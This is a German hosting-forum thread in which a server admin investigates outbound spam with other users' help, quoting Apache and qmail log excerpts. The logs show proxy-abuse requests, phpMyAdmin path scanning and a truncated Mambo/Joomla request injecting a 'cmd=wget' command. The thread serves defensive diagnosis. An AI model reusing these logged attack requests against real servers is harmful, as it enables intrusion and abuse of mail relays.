Spam von meinem Server ausgehend?!

[hackintosh]

Hallo Gemeinde,

mir fiel in der Trafficstatistik auf, dass an 3 Tagen im letzten Monat unheimlich viel Traffic produziert wurde, im Plesk Bericht taucht dieser nicht auf. Beim durchsuchen der Logfiles fiel mir in der mail.info auf, dass scheinbar ohne Ende Spam über qmail verschickt wurde. Daraufhin habe ich mir die acces.logs angeschaut und dort viele viele viele solcher Einträge gefunden:

201.56.113.230 - - [08/Nov/2006:19:48:09 +0100] "POST http://www.mcloudalumni.com/tellafriend ... ion=submit HTTP/1.1" 404 1167 "http://www.mcloudalumni.com/" "-"
201.56.113.230 - - [08/Nov/2006:19:48:15 +0100] "POST http://www.donauflimmern.de/class_mail_example.php HTTP/1.1" 404 1211 "http://www.donauflimmern.de/class_mail_example.php" "-"
201.56.113.230 - - [08/Nov/2006:19:48:19 +0100] "POST http://www.curetravel.eu/appointment.php HTTP/1.1" 404 1158 "http://www.curetravel.eu/" "-"
201.56.113.230 - - [08/Nov/2006:19:48:29 +0100] "POST http://www.uranus-international.com/html/contact.php HTTP/1.1" 404 1191 "http://www.uranus-international.com/" "-"
201.56.113.230 - - [08/Nov/2006:19:48:34 +0100] "POST http://www.chriskiefer.de/kontakt.php HTTP/1.1" 404 1161 "http://www.chriskiefer.de/" "-"
201.56.113.230 - - [08/Nov/2006:19:48:38 +0100] "POST http://www.tri-art.ca/index1.php?cont=contact HTTP/1.1" 404 1149 "http://www.tri-art.ca/" "-"
201.56.113.230 - - [08/Nov/2006:19:48:48 +0100] "POST http://www.gumpage.com/sendinfobyemail.php HTTP/1.1" 404 1152 "http://www.gumpage.com/" "-"

201.56.113.230 - - [08/Nov/2006:19:52:07 +0100] "POST http://registration.premierwebsitesolut ... illink.cgi HTTP/1.1" 404 1209 "http://www.premierwebsitesolutions.com/" "-"

oder auch

129.113.1.168 - - [09/Nov/2006:02:10:33 +0100] "GET http://www.microsoft.com/ HTTP/1.0" 200 1302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
129.113.1.168 - - [09/Nov/2006:02:10:34 +0100] "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.0" 200 1302 "-" "-"
129.113.1.168 - - [09/Nov/2006:02:10:36 +0100] "CONNECT http://lti-mail01.ltinetworks.com:25 HTTP/1.0" 400 304 "-" "-"

oder

213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /phpmyadmin/main.php HTTP/1.1" 404 1019 "-" "-"
213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /PMA/main.php HTTP/1.1" 404 1019 "-" "-"
213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /mysql/main.php HTTP/1.1" 404 1019 "-" "-"
213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /admin/main.php HTTP/1.1" 404 1019 "-" "-"
213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /db/main.php HTTP/1.1" 404 1019 "-" "-"
213.251.166.26 - - [12/Nov/2006:04:52:56 +0100] "GET /dbadmin/main.php HTTP/1.1" 404 1019 "-" "-"


Was ist die Ursache? Ein script auf meinem server? Wie bekomme ich mehr Informationen? Die in den Einträgen oben geposteten Websites befinden sich übrigens nicht auf meinem Server.

Für Hilfe wäre ich sehr dankbar, sollten weitere Infos nötig sein, poste ich diese gerne hier, bzw stelle logfiles zum download bereit.

Danke, Kristian.

[taurin]

Hallo Christian,

Deinen ersten Block kannst Du vergessen, da sind nur "404"-Antworten drin, also "File not found".

Im zweiten Block hat jemand versucht Deinen Webserver als Proxy zu benutzen, was spannenderweise bei POST und GET, sogar auf Port 25 eines anderen Servers der Fall ist (Code 200 = OK).

Der letzte Block ist wieder nur 404 not found, also egal.

Was ich nicht ganz verstehe: Du schreibst, dass aus Deiner mail.info ersichtlich ist, dass gespamt wurde. Offensichtlich haben die Log-Einträge Deines Apache damit nichts zu tun. Auch wenn mir der mittlere Block Sorgen machen würde, nicht das Du einen offenen Proxy betreibst.

Insofern würde ich bzgl. der Spam-Mails intensiver meine mail configs anschauen und natürlich erstmal, sofern möglich, den smtpd runterfahren, um weitere Spammer zu meiden.

Die Informationsbasis ist natürlich noch ein wenig zu dünn, aber ich denke Du hast sowohl Probleme mit Deiner apache, als auch Deiner qmail-config.

[rot]

Im zweiten Block hat jemand versucht Deinen Webserver als Proxy zu benutzen, was spannenderweise bei POST und GET, sogar auf Port 25 eines anderen Servers der Fall ist (Code 200 = OK).

Was aber nicht viel bedeuten muss. Denn es kann auch sein (bzw. halte ich es sogar für sehr wahrscheinlich), dass in dem Fall einfach die Startseite des Default-Virtual-Hosts ausgeliefert wurde.

[hackintosh]

Hallo Taurin,

danke erst mal, dass Du Dir Zeit genommen hast mir zu antworten.
Die Sache mit dem Proxy kann schon sein, aber ist Dir aufgefallen dass die URLs alle auf Kontaktformulare und ähnliches verweisen?!

Hier mal ein Auszug aus der mail.info:

Nov 5 04:15:13 piripiri139 qmail: 1162696513.014704 status: local 0/10 remote 19/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.014718 starting delivery 257546: msg 3002384 to remote stevenakoch@aol.com
Nov 5 04:15:13 piripiri139 qmail: 1162696513.014730 status: local 0/10 remote 20/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.142959 delivery 257539: deferral: 64.12.138.89_failed_after_I_sent_the_message./Remote_host_said:_421-:__(DYN:T1)__http://postmaster.info.aol.com/errors/421dynt1.html/421_SERVICE_NOT_AVAILABLE/
Nov 5 04:15:13 piripiri139 qmail: 1162696513.143002 status: local 0/10 remote 19/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.143015 starting delivery 257547: msg 3002384 to remote salproductions@aol.com
Nov 5 04:15:13 piripiri139 qmail: 1162696513.143027 status: local 0/10 remote 20/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.467711 delivery 257543: deferral: 64.12.137.168_failed_after_I_sent_the_message./Remote_host_said:_421-:__(DYN:T1)__http://postmaster.info.aol.com/errors/421dynt1.html/421_SERVICE_NOT_AVAILABLE/
Nov 5 04:15:13 piripiri139 qmail: 1162696513.467757 status: local 0/10 remote 19/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.467770 starting delivery 257548: msg 3002384 to remote jamesgraf822@aol.com
Nov 5 04:15:13 piripiri139 qmail: 1162696513.467783 status: local 0/10 remote 20/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.661344 delivery 257544: deferral: 64.12.138.120_failed_after_I_sent_the_message./Remote_host_said:_421-:__(DYN:T1)__http://postmaster.info.aol.com/errors/421dynt1.html/421_SERVICE_NOT_AVAILABLE/
Nov 5 04:15:13 piripiri139 qmail: 1162696513.661390 status: local 0/10 remote 19/20
Nov 5 04:15:13 piripiri139 qmail: 1162696513.904269 starting delivery 257549: msg 3002384 to remote paulflcnr@aol.com
Nov 5 04:15:15 piripiri139 qmail: 1162696515.210214 status: local 0/10 remote 20/20
Nov 5 04:15:15 piripiri139 qmail: 1162696515.213540 delivery 257545: deferral: 64.12.138.152_failed_after_I_sent_the_message./Remote_host_said:_421-:__(DYN:T1)__http://postmaster.info.aol.com/errors/421dynt1.html/421_SERVICE_NOT_AVAILABLE/


Ob die jetzt angekommen sind oder nicht ist ja egal, aber die emailaddressen sind mit Sicherheit keine Kontakte von meinen Kunden.

Ich konnte jetzt auch den Kunden ausfindig machen, in dessen logs diese URLs von oben auftauchen. Kriege ich heraus welches script dafür verantwortlich ist?

[taurin]

Die Sache mit dem Proxy kann schon sein, aber ist Dir aufgefallen dass die URLs alle auf Kontaktformulare und ähnliches verweisen?!

Ja, aber so wie ich das Log verstehe, versucht ja nur jemand anonym Seiten anzusurfen. Er könnte auf eBay whitehouse.gov oder sonstwas gehen, in dem Fall halt Kontaktformulare. Deswegen wird aber kein Spam über Deinen Server versendet, das sind einfach 2 verschiedene Dinge.

Bzgl. Deiner mail.info: Ich gehe wie gesagt davon aus, dass es sich hier um 2 verschiedene Dinge handelt. Muss man sich an Deinem smtpd authentisieren, bevor man etwas versenden darf?

Ich konnte jetzt auch den Kunden ausfindig machen, in dessen logs diese URLs von oben auftauchen. Kriege ich heraus welches script dafür verantwortlich ist?

Sofern das wirklich mit den Spammails in Bezug steht: Ja. Grep das httpd access Log das Kunden einfach durch.

[hackintosh]

Hi Taurin,

es gibt ja zur Zeit noch einen zweiten Thread mit ähnlichem Problem.
Habe das /var/log/apache2/acces_log nach wget durchsucht und auch einige Einträge gefunden. Alle stehen im Zusammenhang mit Joomla CMS welches bei mehreren Kunden installiert ist, aber alle Versuche laufen mit 404 ins Leere.


64.5.44.212 - - [25/Oct/2006:18:27:19 +0200] "GET http://83.133.81.149/mambo/index.php?op ... ?&cmd=wget HTTP/1.0" 404 1522 "http://83.133.81.149/mambo/index.php?op ... ?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Ich habe jetzt in der php.ini allow_url_fopen = Off gesetzt. Sicherheitshalber. Trotzdem weiss ich noch nicht welches exploit verwendet wurde. Ein Update auf die neueste Joomla Version werde ich auch allen Kunden anbieten.